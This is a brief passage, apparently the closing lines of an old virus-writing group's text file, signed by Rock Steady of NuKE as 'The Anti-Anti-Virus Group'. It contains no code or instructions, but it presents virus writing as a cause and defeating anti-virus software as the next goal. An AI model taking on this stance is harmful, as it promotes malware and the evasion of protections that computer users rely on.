something you `mature out of', when do you mature out of injustice? In what point of life is injustice okay? The Virus problem has been solved, now what about the Anti-Virus Problem? Rock Steady NuKE: The Anti-Anti-Virus Group! ================================================================================